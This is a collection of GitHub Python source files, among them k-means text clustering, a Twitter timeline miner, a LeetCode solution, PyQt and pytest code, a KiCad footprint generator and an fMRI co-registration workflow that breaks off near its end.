+{"seq_id":"45682878704","text":"from numpy import array, dot, mean, argsort\nimport gensim\nimport random\n\n\ndef kmeans(tokenListInput, word2vecModel, numIters, numOfCentroids):\n # basic ideas: for each word in a sentence, we are going to translate it into a vector.\n # We define the centroid of a cluster to be the average of all vectors within the cluster.\n # notice that each element of a vector is a feature vector.\n def tokenListToVecArray(tokenl):\n v1 = []\n # print tokenList\n for word in tokenl:\n # each model[word] is a feature vector of size 100 (current default setting)\n # seems that gensim can sometimes miss some words... not sure how to fix\n if word not in word2vecModel.wv.vocab:\n v1.append([-0.9]*100) # smoothing\n else:\n v1.append(word2vecModel[word])\n return gensim.matutils.unitvec(array(v1).mean(axis=0))\n\n def converge(mus1, mus2):\n for i in range(len(mus1)):\n mu1 = mus1[i]\n mu2 = mus2[i]\n print('dot product is', dot(mu1, mu2))\n if abs(1.0 - dot(mu1, mu2)) > 0.001:\n return False\n return True\n\n # This step of kmeans provides a rough idea of how the sentences are distributed.\n # store similarity score in a matrix to avoid extra calculations\n centroidIndexes = random.sample(list(range(0, len(tokenListInput))), numOfCentroids)\n # centroidIndexes = [91, 43, 81, 125, 79, 149, 34, 172, 100, 137, 77, 46, 29, 54, 5, 38, 10, 2, 166, 118, 20, 33, 23, 67, 105, 12, 123, 159, 126, 120, 84, 102, 152, 87, 136, 115, 52, 0, 101, 37, 130, 147, 26, 157, 68, 9, 24, 114, 66, 31, 160, 28, 72, 142, 133]\n\n # print 'numOfCentroids = ', numOfCentroids\n # print centroidIndexes\n # print '>>>>>>>>>>'\n\n mus = list()\n for cent in centroidIndexes:\n print(tokenListInput[cent])\n # to increase computation efficiency and potentially save memory, we store vectors instead of actual word lists\n mus.append(tokenListToVecArray(tokenListInput[cent]))\n\n iterations = numIters\n assignments = [None for _ in range(len(tokenListInput))]\n assignmentsIndexList = [None for _ in range(len(tokenListInput))]\n lastAssignmentIndexList = [None for _ in range(len(tokenListInput))]\n vectorList = [None for _ in range(len(tokenListInput))]\n\n for xiIndex in range(0, len(tokenListInput)):\n xi = tokenListInput[xiIndex]\n vectorList[xiIndex] = tokenListToVecArray(xi)\n\n for numIter in range(0, iterations):\n print(\"kmeans: in iteration \", numIter)\n for xiIndex in range(0, len(tokenListInput)):\n xi = tokenListInput[xiIndex]\n xiVec = vectorList[xiIndex]\n\n maxSimilarity = -2\n # assign every sentence to the closest centroid by cosine similarity\n for muIndex in range(0, len(mus)):\n mu = mus[muIndex]\n\n # print xiVec, mu\n cosSimilarity = dot(xiVec, mu)\n\n # print cosSimilarity, maxSimilarity\n\n if cosSimilarity > maxSimilarity:\n assignmentsIndexList[xiIndex] = muIndex\n assignments[xiIndex] = mu\n maxSimilarity = cosSimilarity\n\n # calculate new centroids by averaging points in the cluster\n clusterCountList = [0 for _ in range(0, len(mus))]\n clusterSumList = [0 for _ in range(0, len(mus))]\n for xiIndex in range(0, len(tokenListInput)):\n 
xiVec = vectorList[xiIndex]\n clusterSumList[assignmentsIndexList[xiIndex]] += xiVec\n clusterCountList[assignmentsIndexList[xiIndex]] += 1\n\n # get and store new centroids\n newMus = [None for m in range(len(mus))]\n for muIndex in range(len(mus)):\n if clusterCountList[muIndex] == 0:\n newMus[muIndex] = 0\n else:\n newMus[muIndex] = clusterSumList[muIndex] / clusterCountList[muIndex]\n\n if lastAssignmentIndexList == assignmentsIndexList:\n break\n\n mus = list(newMus)\n lastAssignmentIndexList = list(assignmentsIndexList)\n return mus, assignmentsIndexList, assignments, vectorList\n\n\n# a: the mean distance between a sample and all other points in the same class\n# b: the mean distance between a sample and all other points in the next nearest cluster.\n# Silhouette Coefficient s for this sample is given by:\n# s = (b-a) / max(a,b)\ndef silhouetteScore(mus, assignmentsIndexList, vectorList):\n '''\n citation: http://www.sciencedirect.com/science/article/pii/0377042787901257\n\n For each point p, first find the average distance between p and all other points in the\n same cluster (this is a measure of cohesion, call it A). Then find the average distance\n between p and all points in the nearest cluster (this is a measure of separation from the\n closest other cluster, call it B). The silhouette coefficient for p is defined as the difference\n between B and A divided by the greater of the two (max(A,B)).\n\n We evaluate the cluster coefficient of each point and from this we can obtain the\n 'overall' average cluster coefficient.\n\n Intuitively, we are trying to measure the space between clusters.\n If cluster cohesion is good (A is small) and cluster separation is good (B is large),\n the numerator will be large, etc.\n\n S(i) will be a good measure of how tight each cluster is coupled.\n '''\n\n # assignmentsIndexList: index = the ith sentence, value = centroid of that sentence\n # vectorList: vector representation of a sentence\n silhouetteScoreL = list()\n muResultList = [list() for _ in range(len(mus))]\n for sentenceID in range(len(vectorList)):\n sVec = vectorList[sentenceID]\n muInd = assignmentsIndexList[sentenceID]\n sMu = mus[muInd]\n sCosSimilarity = dot(sVec, sMu)\n muResultList[muInd].append((sCosSimilarity, sentenceID))\n\n for ptInd in range(len(assignmentsIndexList)):\n sVec = vectorList[ptInd]\n mu = mus[assignmentsIndexList[ptInd]]\n currDist = dot(sVec, mu)\n allDist = [dot(sVec, mu) for mu in mus]\n allDist.remove(currDist)\n\n nextClosestDist = 0\n nextClosestClusterInd = 0\n for distInd in range(len(allDist)):\n if allDist[distInd] > nextClosestDist:\n nextClosestDist = allDist[distInd]\n nextClosestClusterInd = distInd\n\n nextClosestPtsList = muResultList[nextClosestClusterInd]\n\n # because the more positive it is, the more similar the two words are...\n\n b = mean(array([dot(sVec, vectorList[sID]) for _, sID in nextClosestPtsList]))\n\n ptsSameLabelList = muResultList[assignmentsIndexList[ptInd]]\n allDistA = [dot(sVec, vectorList[sID]) for _, sID in ptsSameLabelList]\n maxA = max(allDistA)\n allDistA.remove(maxA)\n a = mean(allDistA)\n\n silhouetteScoreL.append((a-b) / max(a, b))\n return silhouetteScoreL\n\n# # Filter out sentences that are the farthest to their centroids.\n# muResultList = [list() for _ in xrange(len(musR))]\n# for sentenceID in range(len(sentenceList)):\n# sVec = vectorListR[sentenceID]\n# muInd = assignmentsIndexListR[sentenceID]\n# sMu = musR[muInd]\n# sCosSimilarity = dot(sVec, sMu)\n# muResultList[muInd].append((sCosSimilarity, 
sentenceList[sentenceID]))\n#\n# for muListInd in range(len(muResultList)):\n# muResultList[muListInd] = sorted(muResultList[muListInd])\n#\n# print '\\nanomalies for each centroid:'\n# for val in muResultList:\n# print val[0]\n#\n# print '\\ncentroids:'\n# for val in muResultList:\n# print val[-1]\n\n# starting from the given centroid:\n","repo_name":"goyalanish/LegalDocSummarizer","sub_path":"Kmeans.py","file_name":"Kmeans.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"}
+{"seq_id":"38731173730","text":"import twitter, re, datetime, pandas as pd\n\nclass twitterminer():\n\n request_limit = 20 \n api = False\n data = []\n \n\t\n twitter_keys = {\n 'consumer_key': \"\" , #add your consumer key\n 'consumer_secret': \"\" , #add your consumer secret key\n 'access_token_key': \"\" , #add your access token key\n 'access_token_secret': \"\" #add your access token secret key\n }\n \n def __init__(self, request_limit = 100):\n \n self.request_limit = request_limit\n \n # This sets the twitter API object for use internally within the class\n self.set_api()\n \n def set_api(self):\n \n self.api = twitter.Api(\n consumer_key = self.twitter_keys['consumer_key'],\n consumer_secret = self.twitter_keys['consumer_secret'],\n access_token_key = self.twitter_keys['access_token_key'],\n\t\t\taccess_token_secret = self.twitter_keys['access_token_secret']\n )\n\n def mine_user_tweets(self, user=\"anamikap24\", mine_retweets=False):\n\n statuses = self.api.GetUserTimeline(screen_name=user, count=self.request_limit)\n data = []\n\t\t\n for item in statuses:\n\n mined = {\n 'tweet_id': item.id,\n 'handle': item.user.name,\n 'retweet_count': item.retweet_count,\n 'text': item.text,\n 'mined_at': datetime.datetime.now(),\n 'created_at': item.created_at\n }\n \n data.append(mined)\n #status = self.api.PostUpdate('I love python-twitter!') \n return statuses\n\n def favourite(self,user):\n\n\n status = self.api.GetFollowers(screen_name=user,count = self.request_limit)\n # for item in status:\n # print(item.users.name)\n print(status)\n\n \n\n\nminer = twitterminer()\n\n# insert handle we like\ntrump_tweets = miner.mine_user_tweets(\"countermukul\")\n#trump_df = pd.DataFrame(trump_tweets)\nprint(trump_tweets)\n","repo_name":"AnamikaPa/Sentiment_Analysis","sub_path":"Twitter_Program/tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"}
+{"seq_id":"21637361445","text":"#!/usr/bin/python\n# encoding: utf-8\n'''\n\n\tExample of the Singleton design pattern in Python\n\n'''\n\nclass Singleton(object):\n\t_instance = None\n\t\n\tdef __new__(cls):\n\t\tif cls._instance is None:\n\t\t\tprint('Creating a singleton class...')\n\t\t\tcls._instance = super(Singleton,cls).__new__(cls)\n\t\t\t\n\t\treturn cls._instance\n\t\t\n\n\n# ---------- tests ----------\n\nif __name__ == \"__main__\":\n\n\tobj1 = Singleton()\n\tprint(obj1)\n\t\n\tobj2 = Singleton()\n\tprint(obj2)\n\t\n\tprint('Is obj1 equal to obj2?', obj1 is obj2)\n\t\n\t\n","repo_name":"xslyrs/SimplePatterns","sub_path":"singleton.py","file_name":"singleton.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
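The singleton above guards instance creation in __new__. A common alternative is a metaclass that caches one instance per class; this is a generic sketch, not code from that repository:

class SingletonMeta(type):
    _instances = {}

    def __call__(cls, *args, **kwargs):
        # create the instance on first call, reuse it afterwards
        if cls not in cls._instances:
            cls._instances[cls] = super().__call__(*args, **kwargs)
        return cls._instances[cls]


class Config(metaclass=SingletonMeta):
    pass


print(Config() is Config())  # True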
+{"seq_id":"47804094344","text":"class Solution(object):\n def findMinHeightTrees(self, n, edges):\n \"\"\"\n :type n: int\n :type edges: List[List[int]]\n :rtype: List[int]\n \"\"\"\n if not edges:\n return [0]\n dictedges={}\n degreen=[0]*n\n for edge in edges:\n degreen[edge[0]]+=1\n degreen[edge[1]]+=1\n if edge[0] not in dictedges:\n dictedges[edge[0]]=[edge[1]]\n else:\n dictedges[edge[0]].append(edge[1])\n if edge[1] not in dictedges:\n dictedges[edge[1]]=[edge[0]]\n else:\n dictedges[edge[1]].append(edge[0])\n \n stack=[]\n for k in range(len(degreen)):\n if degreen[k]==1:\n stack.append(k)\n \n while len(stack)>2 or max(degreen)>1:\n tmp=[]\n for i in stack:\n for edge in dictedges[i]:\n degreen[edge]-=1\n if degreen[edge]==1:\n tmp.append(edge)\n stack=tmp\n \n return stack\n \n","repo_name":"yangzongwu/leetcode","sub_path":"archives/leetcode2/0310. Minimum Height Trees.py","file_name":"0310. Minimum Height Trees.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"83"}
+{"seq_id":"24628130337","text":"def morale_check_logic(self):\n if self.morale <= 10: # Retreat state when morale is 10 or lower\n self.broken = True\n for this_subunit in self.alive_subunit_list:\n if this_subunit.broken is False: # unit is not broken yet since at least one subunit is not broken\n self.broken = False\n if self.state not in (98, 99):\n self.state = 98\n if self.retreat_start is False:\n self.retreat_start = True\n\n elif self.retreat_start and self.broken is False and self.morale >= 50: # quit retreat when morale reaches the recovery threshold\n self.retreat_start = False\n self.retreat_way = False\n self.issue_order(self.base_pos, False, False, other_command=\"Stop\")\n\n if self.retreat_start and self.state != 96:\n self.find_retreat_target()\n","repo_name":"robgamerz19/Masendor","sub_path":"gamescript/tactical/unit/morale_check_logic.py","file_name":"morale_check_logic.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"}
+{"seq_id":"22573685886","text":"\"\"\"Tests for the ilo module\"\"\"\nimport pandas as pd\nimport pytest\n\nfrom bblocks.import_tools import ilo\nfrom bblocks import set_bblocks_data_path, config\n\nset_bblocks_data_path(config.BBPaths.tests_data)\n\n\nclass TestILO:\n \"\"\"Tests for ILO module\"\"\"\n\n obj = ilo.ILO()\n obj_2 = ilo.ILO()\n\n indicator_1 = \"CLD_TPOP_SEX_AGE_GEO_NB_A\"\n indicator_2 = \"CPI_XCPI_COI_RT_Q\"\n indicator_list = [\"CLD_TPOP_SEX_AGE_NB_A\", \"CLD_XCHD_SEX_AGE_NB_A\"]\n\n def test_update_data_error(self):\n \"\"\"Test that update_data raises an error because no data is loaded\"\"\"\n\n with pytest.raises(RuntimeError, match=\"No indicators loaded\"):\n self.obj.update_data()\n\n def test_available_indicators(self):\n \"\"\"Test that the available indicators are returned and loaded to the object\"\"\"\n\n assert isinstance(self.obj.available_indicators(), pd.DataFrame)\n assert self.obj._available_indicators is not None\n\n def test_load_glossaries(self):\n \"\"\"Test that the glossaries are loaded to the object\"\"\"\n\n self.obj._load_glossaries()\n assert isinstance(self.obj._glossaries, dict)\n\n # check that the values are dictionaries\n key = list(self.obj._glossaries.keys())[0]\n assert isinstance(self.obj._glossaries[key], dict)\n\n def test_load_area_dict(self):\n \"\"\"Test that the area dictionary is loaded to the object\"\"\"\n\n self.obj._load_area_dict()\n assert isinstance(self.obj._area_dict, dict)\n\n def test_load_data(self):\n \"\"\"Test loading a single indicator\"\"\"\n\n self.obj.load_data(self.indicator_1)\n assert self.indicator_1 in 
self.obj._data\n assert isinstance(self.obj._data[self.indicator_1], pd.DataFrame)\n\n self.obj._glossaries = None # set glossaries back to None\n self.obj._area_dict = None # set area dictionary back to None\n\n self.obj.load_data(self.indicator_2)\n assert self.indicator_2 in self.obj._data\n assert isinstance(self.obj._data[self.indicator_2], pd.DataFrame)\n\n assert (\n self.indicator_1 in self.obj._data\n ) # check that first indicator is still there\n\n def test_load_data_list(self):\n \"\"\"Test loading a list of indicators\"\"\"\n\n self.obj.load_data(self.indicator_list)\n assert self.indicator_list[0] in self.obj._data\n assert isinstance(self.obj._data[self.indicator_list[0]], pd.DataFrame)\n assert self.indicator_list[1] in self.obj._data\n assert isinstance(self.obj._data[self.indicator_list[1]], pd.DataFrame)\n\n def test_load_data_error(self):\n \"\"\"Test that an error is raised if the indicator is invalid\"\"\"\n\n with pytest.raises(ValueError, match=\"Indicator not available\"):\n self.obj.load_data(\"invalid\")\n\n def test_update_data_when_data_loaded_from_disk(self):\n \"\"\"Test that the data is updated correctly when data is loaded from disk\"\"\"\n\n # mock data loaded from disk - data object is not empty but glossaries and areas are empty\n self.obj_2.load_data(self.indicator_1)\n self.obj_2._glossaries = None\n self.obj_2._area_dict = None\n\n self.obj_2.update_data()\n assert self.indicator_1 in self.obj_2._data\n assert isinstance(self.obj_2._data[self.indicator_1], pd.DataFrame)\n assert self.obj_2._glossaries is not None\n assert self.obj_2._area_dict is not None\n","repo_name":"ONEcampaign/bblocks","sub_path":"tests/test_import_tools/test_ilo.py","file_name":"test_ilo.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"16832784798","text":"import functools\nimport random\nfrom trace import pens\n\nfrom PyQt5 import QtGui, QtCore, QtWidgets\nimport PyQt5.uic\nimport numpy\n\nfrom .AverageViewTable import AverageViewTable\nfrom . 
import MainWindowWidget\nfrom scan.ScanControl import ScanControl\nfrom fit.FitUi import FitUi\nfrom modules import DataDirectory\nfrom trace.PlottedTrace import PlottedTrace\nfrom trace.TraceCollection import TraceCollection\nfrom trace.Traceui import Traceui\n\nimport os\nuipath = os.path.join(os.path.dirname(__file__), '..', 'ui/testExperiment.ui')\ntestForm, testBase = PyQt5.uic.loadUiType(uipath)\n\nclass test(testForm, MainWindowWidget.MainWindowWidget):\n StatusMessage = QtCore.pyqtSignal( str )\n ClearStatusMessage = QtCore.pyqtSignal()\n experimentName = 'Test Scan'\n\n def __init__(self,globalVariablesUi, parent=None, measurementLog=None):\n MainWindowWidget.MainWindowWidget.__init__(self, parent)\n testForm.__init__(self)\n self.globalVariablesUi = globalVariablesUi\n self.measurementLog = measurementLog \n# pyqtgraph.setConfigOption('background', 'w')\n# pyqtgraph.setConfigOption('foreground', 'k')\n\n def setupUi(self, MainWindow, config):\n testForm.setupUi(self, MainWindow)\n self.config = config\n self.plottedTrace = None\n self._graphicsView = self.graphicsLayout._graphicsView\n self.penicons = pens.penicons().penicons()\n self.traceui = Traceui(self.penicons, self.config, \"testExperiment\", { \"Plot Window\": {'view': self._graphicsView}})\n self.traceui.setupUi(self.traceui)\n self.dockWidget.setWidget( self.traceui )\n self.dockWidgetList.append(self.dockWidget)\n self.fitWidget = FitUi(self.traceui, self.config, \"testExperiment\", globalDict = self.globalVariablesUi.variables )\n self.fitWidget.setupUi(self.fitWidget)\n self.dockWidgetFitUi.setWidget( self.fitWidget )\n self.dockWidgetList.append(self.dockWidgetFitUi )\n self.displayUi = AverageViewTable(self.config)\n self.displayUi.setupUi()\n self.displayDock = QtWidgets.QDockWidget(\"Average\")\n self.displayDock.setObjectName(\"Average\")\n self.displayDock.setWidget( self.displayUi )\n self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.displayDock)\n self.dockWidgetList.append(self.displayDock )\n if 'testWidget.MainWindow.State' in self.config:\n QtWidgets.QMainWindow.restoreState(self, self.config['testWidget.MainWindow.State'])\n#start added\n self.scanControlWidget = ScanControl(config, self.globalVariablesUi, self.experimentName)\n self.scanControlWidget.setupUi(self.scanControlWidget)\n self.scanControlUi.setWidget(self.scanControlWidget )\n self.dockWidgetList.append(self.scanControlUi)\n#end added\n self.tabifyDockWidget( self.dockWidgetFitUi, self.scanControlUi )\n\n def addPushDestination(self, name, destination):\n# self.fitWidget.addPushDestination(name, destination)\n pass\n \n def setPulseProgramUi(self, pulseProgramUi):\n self.pulseProgramUi = pulseProgramUi\n self.pulseProgramUi.addExperiment('Sequence')\n\n def onClear(self):\n self.dockWidget.setVisible(True)\n self.StatusMessage.emit(\"test Clear not implemented\")\n \n def onSave(self):\n self.StatusMessage.emit(\"test Save not implemented\")\n\n def onStart(self):\n self.scanType = self.scanControlWidget.scanRepeatComboBox.currentIndex()\n#start added\n if self.scanType == 0:\n self.startScan()\n elif self.scanType == 1:\n self.createAverageScan()\n self.startScan()\n#end added\n self.timer = QtCore.QTimer()\n self.timer.setInterval(10)\n self.timer.timeout.connect( self.onData )\n self.timer.start(10)\n self.displayUi.onClear()\n\n#start added\n def createAverageScan(self):\n self.averagePlottedTrace = PlottedTrace(TraceCollection(), self._graphicsView, pens.penList)\n self.averagePlottedTrace.trace.name = \"test average trace\"\n 
self.averagePlottedTrace.trace.description[\"comment\"] = \"average trace comment\"\n self.averagePlottedTrace.trace.filenameCallback = functools.partial(self.traceFilename, '')\n self.traceui.addTrace(self.averagePlottedTrace, pen=0)\n#end added\n\n def startScan(self):\n if self.plottedTrace is not None and self.traceui.unplotLastTrace():\n self.plottedTrace.plot(0)\n self.plottedTrace = PlottedTrace(TraceCollection(), self._graphicsView, pens.penList)\n self.xvalue = 0\n self.phase = 0 #random.uniform(0,2*numpy.pi)\n self.plottedTrace.trace.x = numpy.array([self.xvalue])\n c = numpy.sin( self.xvalue + self.phase)**2\n self.plottedTrace.trace.y = numpy.array([random.gauss(c, 0.1)])#c*(1-c))])\n self.plottedTrace.trace.top = numpy.array([0.05])\n self.plottedTrace.trace.bottom = numpy.array([0.05])\n self.plottedTrace.trace.filenameCallback = functools.partial( self.traceFilename, '' )\n if self.scanType == 0:\n self.plottedTrace.trace.name = \"test trace\"\n self.plottedTrace.trace.description[\"comment\"] = \"My Comment\"\n self.traceui.addTrace(self.plottedTrace, pen=-1)\n#start added\n elif self.scanType == 1:\n self.traceui.addTrace(self.plottedTrace, pen=-1, parentTrace=self.averagePlottedTrace)\n self.plottedTrace.trace.name = \"test trace {0}\".format(self.averagePlottedTrace.childCount())\n self.plottedTrace.trace.description[\"comment\"] = \"My Comment {0}\".format(self.averagePlottedTrace.childCount())\n#end added\n\n def onData(self):\n self.xvalue += 0.05\n self.plottedTrace.trace.x = numpy.append( self.plottedTrace.trace.x, self.xvalue )\n c = numpy.sin( self.xvalue + self.phase)**2\n value = random.gauss(c, 0.1)#c*(1-c))\n self.plottedTrace.trace.y = numpy.append( self.plottedTrace.trace.y, value )\n self.plottedTrace.trace.top = numpy.append( self.plottedTrace.trace.top, 0.05)\n self.plottedTrace.trace.bottom = numpy.append( self.plottedTrace.trace.bottom, 0.05)\n self.displayUi.add( [value] )\n self.plottedTrace.replot()\n if self.xvalue > 500:\n if self.scanType == 0:\n self.onStop()\n#start added\n elif self.scanType == 1:\n self.averagePlottedTrace.averageChildren()\n self.averagePlottedTrace.plot(7) #average plot is in black\n self.startScan()\n#end added\n \n def onStop(self):\n if hasattr(self, 'timer'):\n self.timer.stop()\n \n def onPause(self):\n self.StatusMessage.emit(\"test Pause not implemented\")\n \n def activate(self):\n self.StatusMessage.emit(\"test active\")\n MainWindowWidget.MainWindowWidget.activate(self)\n \n def deactivate(self):\n self.StatusMessage.emit(\"test not active\")\n MainWindowWidget.MainWindowWidget.deactivate(self)\n \n def saveConfig(self):\n self.config['testWidget.MainWindow.State'] = QtWidgets.QMainWindow.saveState(self)\n self.traceui.saveConfig()\n self.fitWidget.saveConfig()\n \n def traceFilename(self, pattern):\n directory = DataDirectory.DataDirectory()\n path, _ = QtWidgets.QFileDialog.getSaveFileName(self, 'Save file', directory.path())\n return path\n\n def setGlobalVariablesUi(self, globalVariablesUi ):\n self.globalVariables = globalVariablesUi.variables\n self.globalVariablesChanged = globalVariablesUi.valueChanged\n self.globalVariablesUi = globalVariablesUi\n #self.fitWidget.addPushDestination('Global', globalVariablesUi )\n","repo_name":"pyIonControl/IonControl","sub_path":"gui/testExperiment.py","file_name":"testExperiment.py","file_ext":"py","file_size_in_byte":7737,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"83"} 
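The experiment widget above simulates a scan by sampling y = sin²(x + φ) with Gaussian noise from inside Qt timer callbacks. A stand-alone sketch of just that data model, assuming the widget's constants (0.05 step, σ = 0.1):

import random
import numpy

def simulate_scan(n_points, step=0.05, phase=0.0, sigma=0.1):
    # same signal the widget accumulates point by point in onData()
    x = numpy.arange(n_points) * step
    clean = numpy.sin(x + phase) ** 2
    return x, numpy.array([random.gauss(c, sigma) for c in clean])

x, y = simulate_scan(200)
print(x[:3], y[:3])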
+{"seq_id":"33886768790","text":"#!/usr/bin/python\nimport commands\n\nfilename='SLIMSTACK_200_NED.emp'\noutfile=open(filename,'w')\noutfile.write( \"\"\"PCBNEW-LibModule-V1 7/5/2010 9:25:37 PM\n$INDEX\nSLIMSTACK_200\n$EndINDEX\n$MODULE SLIMSTACK_200\nPo 0 0 0 15 4C31E3F1 4C31D72E ~~\nLi SLIMSTACK_200\nCd SLIMSTACK_200\nKw SLIMSTACK_200\nSc 4C31D72E\nAR \nOp 0 0 0\nAt SMD \nT0 -6063 79 500 500 0 35 N V 21 N\"SLIMSTACK_200\"\nT1 4252 118 500 500 0 35 N V 21 N\"P\"\\n\"\"\")\nA=62.865\nAin=A/25.4*10000\npitch = Ain / 99.0\n\norigin = Ain/2\nfor letter in ['A','B','C','D']:\n if letter=='A':\n xcoord=-1024\n elif letter=='B':\n xcoord=1024\n elif letter=='C':\n xcoord=18750-1024\n elif letter=='D':\n xcoord=18740+1024\n\n for num in range(0,100):\n outfile.write(\"$PAD\\n\")\n outfile.write('Sh \"'+letter+str(num+1)+'\" R 709 138 0 0 0\\n')\n outfile.write('Dr 0 0 0\\n')\n outfile.write('At SMD N 00888000\\n')\n outfile.write('Ne 0 \"\"\\n')\n outfile.write('Po '+str(xcoord)+' '+str(int(-origin+pitch*num))+\"\\n\")\n outfile.write('$EndPAD\\n')\noutfile.write(\"$EndMODULESLIMSTACK_200\\n\")\noutfile.write(\"$EndLIBRARY\\n\")\noutfile.close()\ncommands.getoutput('unix2dos '+filename)\n","repo_name":"jharvey/Cinch_enclosure_template","sub_path":"KICAD_Project/scripts/ned2.py","file_name":"ned2.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"83"} +{"seq_id":"71670830350","text":"from scipy.special import jv as bessel\nfrom scipy.special import jn_zeros as _zeros\nimport math\nI=100\nJ=100\nhr=0.01\nht=0.01\nd=0.1\nzeros=_zeros(1, 100) #excludes 0\nm=8\nzm=zeros[m-2]\nprint(\"zm = %d\\n\" %zm)\ndef bes(x):\n return bessel(0, x)\ndef sol(r, t):\n return bes(zm*r) * math.exp(- d * zm**2 * t)\n\n#folder = \"pres/rdiff3/\"\nfolder = \"\"\nconst_diff_ic = open(folder + \"rconst_diff_ic.scv\", \"w+\")\nuss='\\n'.join([';'.join(\n [','.join(\n map(str, [sol(i*hr, 0)] * 6)\n ) for i in range(I)]\n ) for J in range(J)])\nconst_diff_ic.write(uss)\nconst_diff_ic.close()\n#print(bessel(1, zm))\neach = 1\ntime = 0.1\nconst_diff_ex = open(folder + \"rconst_diff_ex.csv\", \"w+\")\nn_rows = int(time/ht/each+1)\nprint(\"n_rows = %d\\n\" %n_rows)\ntimes = [i*ht*each for i in range(0,n_rows)]\ndef sol_rs(t):\n return ','.join([str(sol(i*hr, t)) for i in range(0,I+1)])\nuss='\\n'.join(\n map(sol_rs, times))\nconst_diff_ex.write(uss)\nconst_diff_ex.close()\n","repo_name":"archqua/mitosis","sub_path":"cylinder/discont/kode/const_diff_test/rtest.py","file_name":"rtest.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5690118930","text":"import os\nimport numpy as np\nimport nibabel as nib\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport nipype.interfaces.fsl as fsl # importing FSL interface functions\nfrom nilearn import image\nfrom nilearn.plotting import plot_anat, plot_epi, view_img\nfrom nipype import Node, Workflow # components to construct workflow\nfrom nipype.interfaces.io import DataSink # datasink\nfrom bids.layout import BIDSLayout # BIDSLayout object to specify file(s)\n\n\n# Directory where your data set resides.\ndataDir = '/tmp/Data/ds102'\n\n# Creating the layout object for this BIDS data set\nlayout = BIDSLayout(dataDir)\n\n# an fMRI image from one of the subjects (run 1 only)\nimagefMRI = layout.get(subject='26',\n run='1',\n suffix='bold',\n extension='nii.gz',\n 
+{"seq_id":"5690118930","text":"import os\nimport numpy as np\nimport nibabel as nib\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport nipype.interfaces.fsl as fsl # importing FSL interface functions\nfrom nilearn import image\nfrom nilearn.plotting import plot_anat, plot_epi, view_img\nfrom nipype import Node, Workflow # components to construct workflow\nfrom nipype.interfaces.io import DataSink # datasink\nfrom bids.layout import BIDSLayout # BIDSLayout object to specify file(s)\n\n\n# Directory where your data set resides.\ndataDir = '/tmp/Data/ds102'\n\n# Creating the layout object for this BIDS data set\nlayout = BIDSLayout(dataDir)\n\n# an fMRI image from one of the subjects (run 1 only)\nimagefMRI = layout.get(subject='26',\n run='1',\n suffix='bold',\n extension='nii.gz',\n return_type='file')[0]\n\n# T1 image from the layout object\nimageT1 = layout.get(subject='26',\n suffix='T1w',\n extension='nii.gz',\n return_type='file')[0]\n\n# Output directory\noutDir = os.path.join(dataDir, 'WorkflowOutput')\n\n\n\n# node to skip dummy scans\nextract = Node(fsl.ExtractROI(in_file=imagefMRI, # input image\n t_min=4, # first 4 volumes are deleted\n t_size=-1),\n name=\"extract\")\n\n# creating motion correction node\nmcflirt = Node(fsl.MCFLIRT(save_rms=True,\n save_plots=True,\n mean_vol=True), # saving displacement parameters\n name=\"mcflirt\")\n\n# creating co-registration node (estimating the coregistration parameters)\ncoreg = Node(fsl.FLIRT(reference=imageT1, # target: T1-weighted\n dof=6, # specifying rigid-body (6-parameters)\n cost='normmi'), # normalized mutual info\n name=\"coreg\")\n\n# applying the coregistration parameters to the entire time series\napplywarp = Node(fsl.FLIRT(reference=imageT1,\n apply_isoxfm=4), # forcing the voxel size = 4mm\n name=\"applywarp\")\n\n\n# creating datasink to collect outputs\ndatasink = Node(DataSink(base_directory=outDir),\n name='datasink')\n\n\n\n# creating a workflow\ncoReg = Workflow(name=\"coReg\", base_dir=outDir)\n\n# and connecting nodes\ncoReg.connect(extract,'roi_file', mcflirt, 'in_file')\n# mcflirt mean image as input for the first FLIRT\ncoReg.connect(mcflirt, 'mean_img', coreg, 'in_file')\n# mcflirt fMRI as input for the second FLIRT\ncoReg.connect(mcflirt, 'out_file', applywarp, 'in_file')\n# and passing on the rigid-body transformation parameters from first FLIRT\ncoReg.connect(coreg, 'out_matrix_file', applywarp,'in_matrix_file')\n\n# second FLIRT node to data sink\ncoReg.connect(applywarp, 'out_file', datasink, 'CoRegfMRI')\n# second motion corrected mean fMRI to data sink\ncoReg.connect(mcflirt, 'mean_img', datasink, 'MoCorMean')\n\n\n\n# writing out graph\ncoReg.write_graph(graph2use='orig', dotfilename='graph_orig.dot')\n\n# showing the graph\nplt.figure(figsize=[6,6])\nimg=mpimg.imread(os.path.join(outDir,\"coReg\",\"graph_orig.png\"))\nimgplot = plt.imshow(img)\nplt.axis('off')\nplt.show()\n\n\n\n# running the workflow\ncoReg.run()\n\n\n\n# examining the coregistration results\n# Coregistered fMRI\nimageCoRegfMRI = os.path.join(os.path.join(outDir,'CoRegfMRI'),\n 'sub-26_task-flanker_run-1_bold_roi_mcf_flirt.nii.gz')\n# mean of the co-registered fMRI\nmean_imageCoRegfMRI = image.mean_img(imageCoRegfMRI)\n\n\n# displaying the mean of the co-registered fMRI (axial)\ndisplay = plot_anat(mean_imageCoRegfMRI,\n display_mode='z',\n cut_coords=6)\n\n# adding edges from the corresponding T1w image\ndisplay.add_edges(imageT1)\n\n\n# displaying the mean of the co-registered fMRI (sagittal)\ndisplay = plot_anat(mean_imageCoRegfMRI,\n 